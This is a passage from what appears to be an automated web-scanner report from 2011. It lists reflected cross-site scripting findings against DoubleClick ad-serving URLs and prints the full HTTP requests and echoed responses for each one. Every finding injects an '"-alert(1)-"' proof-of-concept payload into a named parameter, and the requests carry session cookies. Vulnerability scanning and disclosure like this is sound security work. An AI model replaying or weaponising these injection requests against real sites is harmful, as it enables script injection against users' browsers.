Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1300849415&flash=10.2.154&url=http%3A%2F%2Fwww.tmz.com%2F&dt=1300831415414&bpp=4&shv=r20101117&jsv=r20110321-2&correlator=1300831415458&frm=0&adk=4257168233&ga_vid=2111348435.1300831415&ga_sid=1300831415&ga_hid=21570317&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1058&bih=995&eid=33895132&fu=0&ifi=1&dtd=65&xpc=Qc00ugmKxW&p=http%3A//www.tmz.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/1049449/15055,2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 22 Mar 2011 22:03:58 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 22:03:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4954

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 12,381 Template Name = In-Page Flash Banner w/ DoubleVerif
...[SNIP]...
l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/f/17c/%2a/e%3B238208793%3B0-0%3B0%3B61271527%3B3454-728/90%3B41152703/41170490/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l48c1c"-alert(1)-"6255ab16084&ai=B1yAwrRyJTeb7Hty46Aa32ZTtDNrrrI8CouXKqBq-oOWYNuCQ4QQQARgBIMuVrxM4AFCulJOBB2DJBqABpuKz6gOyAQt3d3cudG16LmNvbboBCTcyOHg5MF9hc8gBCdoBE2h0dHA6Ly93d3cudG16LmNvbS-4AhjAAgXIAvK1nBuoAwHRA1-0zbvopV3k6AO4AegD
...[SNIP]...

1.7. http://ad.doubleclick.net/adi/N5956.Google/B3941858.34 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.34

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18602"-alert(1)-"78977e6fbdc was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5956.Google/B3941858.34;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B9tN32RyJTbjRBIPPlQfA5vyODfzBwdwB_MzylhbAjbcB4M_VARABGAEgy5WvEzgAUOO0w5sGYMkGoAHw7Iz1A7IBC3d3dy50bXouY29tugEKMzAweDI1MF9hc8gBCdoBF2h0dHA6Ly93d3cudG16LmNvbS90aXBzuAIYyAKUpN0RqAMB0QNftM276KVd5OgDuAHoA_sD9QMAgACE&num=1&sig=AGiWqty0PWcuxmskCxJxrSPaXVomLajnfA&client=ca-pub-7832112837345590&adurl=18602"-alert(1)-"78977e6fbdc HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7188170409&w=300&lmt=1300849458&flash=10.2.154&url=http%3A%2F%2Fwww.tmz.com%2Ftips&dt=1300831458647&bpp=1&shv=r20101117&jsv=r20110321-2&correlator=1300831458854&frm=2&adk=1180302198&ga_vid=563101533.1300831459&ga_sid=1300831459&ga_hid=801118965&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1042&bih=995&loc=http%3A%2F%2Fwww.tmz.com%2Ftips&fu=0&ifi=1&dtd=211&xpc=vKHtIyAOF6&p=http%3A//www.tmz.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|1831140/746237/15055,998766/1049449/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6880
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 22 Mar 2011 22:06:27 GMT
Expires: Tue, 22 Mar 2011 22:06:27 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
d3dy50bXouY29tugEKMzAweDI1MF9hc8gBCdoBF2h0dHA6Ly93d3cudG16LmNvbS90aXBzuAIYyAKUpN0RqAMB0QNftM276KVd5OgDuAHoA_sD9QMAgACE&num=1&sig=AGiWqty0PWcuxmskCxJxrSPaXVomLajnfA&client=ca-pub-7832112837345590&adurl=18602"-alert(1)-"78977e6fbdchttp://learning.capella.edu/banners.aspx?revkey=151263");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow
...[SNIP]...

1.8. http://ad.doubleclick.net/adi/N5956.Google/B3941858.34 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.34

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec400"-alert(1)-"326249badcd was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5956.Google/B3941858.34;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B9tN32RyJTbjRBIPPlQfA5vyODfzBwdwB_MzylhbAjbcB4M_VARABGAEgy5WvEzgAUOO0w5sGYMkGoAHw7Iz1A7IBC3d3dy50bXouY29tugEKMzAweDI1MF9hc8gBCdoBF2h0dHA6Ly93d3cudG16LmNvbS90aXBzuAIYyAKUpN0RqAMB0QNftM276KVd5OgDuAHoA_sD9QMAgACEec400"-alert(1)-"326249badcd&num=1&sig=AGiWqty0PWcuxmskCxJxrSPaXVomLajnfA&client=ca-pub-7832112837345590&adurl=;ord=689417439? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7188170409&w=300&lmt=1300849458&flash=10.2.154&url=http%3A%2F%2Fwww.tmz.com%2Ftips&dt=1300831458647&bpp=1&shv=r20101117&jsv=r20110321-2&correlator=1300831458854&frm=2&adk=1180302198&ga_vid=563101533.1300831459&ga_sid=1300831459&ga_hid=801118965&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1042&bih=995&loc=http%3A%2F%2Fwww.tmz.com%2Ftips&fu=0&ifi=1&dtd=211&xpc=vKHtIyAOF6&p=http%3A//www.tmz.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|1831140/746237/15055,998766/1049449/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 22 Mar 2011 22:05:53 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 22:05:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6910

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
JTbjRBIPPlQfA5vyODfzBwdwB_MzylhbAjbcB4M_VARABGAEgy5WvEzgAUOO0w5sGYMkGoAHw7Iz1A7IBC3d3dy50bXouY29tugEKMzAweDI1MF9hc8gBCdoBF2h0dHA6Ly93d3cudG16LmNvbS90aXBzuAIYyAKUpN0RqAMB0QNftM276KVd5OgDuAHoA_sD9QMAgACEec400"-alert(1)-"326249badcd&num=1&sig=AGiWqty0PWcuxmskCxJxrSPaXVomLajnfA&client=ca-pub-7832112837345590&adurl=http%3a%2f%2flearning.capella.edu/banners.aspx%3Frevkey%3D151263");
var fscUrl = url;
var fscUrlClickTagFound = fals
...[SNIP]...

1.9. http://ad.doubleclick.net/adi/N5956.Google/B3941858.34 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.34

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd738"-alert(1)-"12e78c94558 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5956.Google/B3941858.34;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B9tN32RyJTbjRBIPPlQfA5vyODfzBwdwB_MzylhbAjbcB4M_VARABGAEgy5WvEzgAUOO0w5sGYMkGoAHw7Iz1A7IBC3d3dy50bXouY29tugEKMzAweDI1MF9hc8gBCdoBF2h0dHA6Ly93d3cudG16LmNvbS90aXBzuAIYyAKUpN0RqAMB0QNftM276KVd5OgDuAHoA_sD9QMAgACE&num=1&sig=AGiWqty0PWcuxmskCxJxrSPaXVomLajnfA&client=ca-pub-7832112837345590fd738"-alert(1)-"12e78c94558&adurl=;ord=689417439? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7188170409&w=300&lmt=1300849458&flash=10.2.154&url=http%3A%2F%2Fwww.tmz.com%2Ftips&dt=1300831458647&bpp=1&shv=r20101117&jsv=r20110321-2&correlator=1300831458854&frm=2&adk=1180302198&ga_vid=563101533.1300831459&ga_sid=1300831459&ga_hid=801118965&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1042&bih=995&loc=http%3A%2F%2Fwww.tmz.com%2Ftips&fu=0&ifi=1&dtd=211&xpc=vKHtIyAOF6&p=http%3A//www.tmz.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|1831140/746237/15055,998766/1049449/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 22 Mar 2011 22:06:24 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 22:06:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6910

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
1A7IBC3d3dy50bXouY29tugEKMzAweDI1MF9hc8gBCdoBF2h0dHA6Ly93d3cudG16LmNvbS90aXBzuAIYyAKUpN0RqAMB0QNftM276KVd5OgDuAHoA_sD9QMAgACE&num=1&sig=AGiWqty0PWcuxmskCxJxrSPaXVomLajnfA&client=ca-pub-7832112837345590fd738"-alert(1)-"12e78c94558&adurl=http%3a%2f%2flearning.capella.edu/banners.aspx%3Frevkey%3D151263");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
...[SNIP]...

1.10. http://ad.doubleclick.net/adi/N5956.Google/B3941858.34 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.34

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8cf5"-alert(1)-"b71604affcc was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5956.Google/B3941858.34;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B9tN32RyJTbjRBIPPlQfA5vyODfzBwdwB_MzylhbAjbcB4M_VARABGAEgy5WvEzgAUOO0w5sGYMkGoAHw7Iz1A7IBC3d3dy50bXouY29tugEKMzAweDI1MF9hc8gBCdoBF2h0dHA6Ly93d3cudG16LmNvbS90aXBzuAIYyAKUpN0RqAMB0QNftM276KVd5OgDuAHoA_sD9QMAgACE&num=1d8cf5"-alert(1)-"b71604affcc&sig=AGiWqty0PWcuxmskCxJxrSPaXVomLajnfA&client=ca-pub-7832112837345590&adurl=;ord=689417439? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7188170409&w=300&lmt=1300849458&flash=10.2.154&url=http%3A%2F%2Fwww.tmz.com%2Ftips&dt=1300831458647&bpp=1&shv=r20101117&jsv=r20110321-2&correlator=1300831458854&frm=2&adk=1180302198&ga_vid=563101533.1300831459&ga_sid=1300831459&ga_hid=801118965&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1042&bih=995&loc=http%3A%2F%2Fwww.tmz.com%2Ftips&fu=0&ifi=1&dtd=211&xpc=vKHtIyAOF6&p=http%3A//www.tmz.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|1831140/746237/15055,998766/1049449/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 22 Mar 2011 22:06:04 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 22:06:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6910

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
IPPlQfA5vyODfzBwdwB_MzylhbAjbcB4M_VARABGAEgy5WvEzgAUOO0w5sGYMkGoAHw7Iz1A7IBC3d3dy50bXouY29tugEKMzAweDI1MF9hc8gBCdoBF2h0dHA6Ly93d3cudG16LmNvbS90aXBzuAIYyAKUpN0RqAMB0QNftM276KVd5OgDuAHoA_sD9QMAgACE&num=1d8cf5"-alert(1)-"b71604affcc&sig=AGiWqty0PWcuxmskCxJxrSPaXVomLajnfA&client=ca-pub-7832112837345590&adurl=http%3a%2f%2flearning.capella.edu/banners.aspx%3Frevkey%3D151263");
var fscUrl = url;
var fscUrlClickTagFound = false;
va
...[SNIP]...

1.11. http://ad.doubleclick.net/adi/N5956.Google/B3941858.34 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.34

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42fe9"-alert(1)-"56fa64cb305 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5956.Google/B3941858.34;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B9tN32RyJTbjRBIPPlQfA5vyODfzBwdwB_MzylhbAjbcB4M_VARABGAEgy5WvEzgAUOO0w5sGYMkGoAHw7Iz1A7IBC3d3dy50bXouY29tugEKMzAweDI1MF9hc8gBCdoBF2h0dHA6Ly93d3cudG16LmNvbS90aXBzuAIYyAKUpN0RqAMB0QNftM276KVd5OgDuAHoA_sD9QMAgACE&num=1&sig=AGiWqty0PWcuxmskCxJxrSPaXVomLajnfA42fe9"-alert(1)-"56fa64cb305&client=ca-pub-7832112837345590&adurl=;ord=689417439? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7188170409&w=300&lmt=1300849458&flash=10.2.154&url=http%3A%2F%2Fwww.tmz.com%2Ftips&dt=1300831458647&bpp=1&shv=r20101117&jsv=r20110321-2&correlator=1300831458854&frm=2&adk=1180302198&ga_vid=563101533.1300831459&ga_sid=1300831459&ga_hid=801118965&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1042&bih=995&loc=http%3A%2F%2Fwww.tmz.com%2Ftips&fu=0&ifi=1&dtd=211&xpc=vKHtIyAOF6&p=http%3A//www.tmz.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|1831140/746237/15055,998766/1049449/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 22 Mar 2011 22:06:14 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 22:06:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6910

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
GAEgy5WvEzgAUOO0w5sGYMkGoAHw7Iz1A7IBC3d3dy50bXouY29tugEKMzAweDI1MF9hc8gBCdoBF2h0dHA6Ly93d3cudG16LmNvbS90aXBzuAIYyAKUpN0RqAMB0QNftM276KVd5OgDuAHoA_sD9QMAgACE&num=1&sig=AGiWqty0PWcuxmskCxJxrSPaXVomLajnfA42fe9"-alert(1)-"56fa64cb305&client=ca-pub-7832112837345590&adurl=http%3a%2f%2flearning.capella.edu/banners.aspx%3Frevkey%3D151263");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var
...[SNIP]...

1.12. http://ad.doubleclick.net/adi/N5956.Google/B3941858.34 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.34

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67ff4"-alert(1)-"f2e94a5331d was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5956.Google/B3941858.34;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l67ff4"-alert(1)-"f2e94a5331d&ai=B9tN32RyJTbjRBIPPlQfA5vyODfzBwdwB_MzylhbAjbcB4M_VARABGAEgy5WvEzgAUOO0w5sGYMkGoAHw7Iz1A7IBC3d3dy50bXouY29tugEKMzAweDI1MF9hc8gBCdoBF2h0dHA6Ly93d3cudG16LmNvbS90aXBzuAIYyAKUpN0RqAMB0QNftM276KVd5OgDuAHoA_sD9QMAgACE&num=1&sig=AGiWqty0PWcuxmskCxJxrSPaXVomLajnfA&client=ca-pub-7832112837345590&adurl=;ord=689417439? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7188170409&w=300&lmt=1300849458&flash=10.2.154&url=http%3A%2F%2Fwww.tmz.com%2Ftips&dt=1300831458647&bpp=1&shv=r20101117&jsv=r20110321-2&correlator=1300831458854&frm=2&adk=1180302198&ga_vid=563101533.1300831459&ga_sid=1300831459&ga_hid=801118965&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1042&bih=995&loc=http%3A%2F%2Fwww.tmz.com%2Ftips&fu=0&ifi=1&dtd=211&xpc=vKHtIyAOF6&p=http%3A//www.tmz.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|1831140/746237/15055,998766/1049449/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 22 Mar 2011 22:05:43 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 22:05:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6910

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
= escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/f/170/%2a/c%3B236509780%3B5-0%3B0%3B41471909%3B4307-300/250%3B40692218/40710005/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l67ff4"-alert(1)-"f2e94a5331d&ai=B9tN32RyJTbjRBIPPlQfA5vyODfzBwdwB_MzylhbAjbcB4M_VARABGAEgy5WvEzgAUOO0w5sGYMkGoAHw7Iz1A7IBC3d3dy50bXouY29tugEKMzAweDI1MF9hc8gBCdoBF2h0dHA6Ly93d3cudG16LmNvbS90aXBzuAIYyAKUpN0RqAMB0QNftM276KVd5OgDuAHo
...[SNIP]...

1.13. http://ad.doubleclick.net/adi/N6036.CNNMoney.com/B5125476.2 [AdID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.CNNMoney.com/B5125476.2

Issue detail

The value of the AdID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f363"-alert(1)-"4bc1b0ca98c was submitted in the AdID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N6036.CNNMoney.com/B5125476.2;sz=300x250;click=http://ads.cnn.com/event.ng/Type=click&FlightID=353121&AdID=4852423f363"-alert(1)-"4bc1b0ca98c&TargetID=82896&Segments=1637,2244,2245,2729,2743,3083,3285,7044,8598,12257,13088,13090,13303,17251,18904,18910,18961,22176,23793,25344,25508,25512,25535,25538,25550,30220,31691,33074,33097,33128,33526,33852,34172,38423,38816,40223,40773,42274,42703,43109,45351,45497,45604,45611,45692,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=;ord=dhpofrv,bgyutdligxmWA? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=336x280_rgt&cnn_money_rollup=homepage&params.styles=fs&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909177541&page.allowcompete=yes&domId=632100
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 23 Mar 2011 19:40:52 GMT
Vary: Accept-Encoding
Expires: Wed, 23 Mar 2011 19:40:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7584

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
oubleclick.net/click%3Bh%3Dv8/3ad3/f/1df/%2a/g%3B234201586%3B1-0%3B0%3B58104650%3B4307-300/250%3B37901085/37918903/3%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=353121&AdID=4852423f363"-alert(1)-"4bc1b0ca98c&TargetID=82896&Segments=1637,2244,2245,2729,2743,3083,3285,7044,8598,12257,13088,13090,13303,17251,18904,18910,18961,22176,23793,25344,25508,25512,25535,25538,25550,30220,31691,33074,33097,33128,33526
...[SNIP]...

1.14. http://ad.doubleclick.net/adi/N6036.CNNMoney.com/B5125476.2 [FlightID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.CNNMoney.com/B5125476.2

Issue detail

The value of the FlightID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97ce9"-alert(1)-"4b1d0a00e01 was submitted in the FlightID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N6036.CNNMoney.com/B5125476.2;sz=300x250;click=http://ads.cnn.com/event.ng/Type=click&FlightID=35312197ce9"-alert(1)-"4b1d0a00e01&AdID=485242&TargetID=82896&Segments=1637,2244,2245,2729,2743,3083,3285,7044,8598,12257,13088,13090,13303,17251,18904,18910,18961,22176,23793,25344,25508,25512,25535,25538,25550,30220,31691,33074,33097,33128,33526,33852,34172,38423,38816,40223,40773,42274,42703,43109,45351,45497,45604,45611,45692,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=;ord=dhpofrv,bgyutdligxmWA? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=336x280_rgt&cnn_money_rollup=homepage&params.styles=fs&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909177541&page.allowcompete=yes&domId=632100
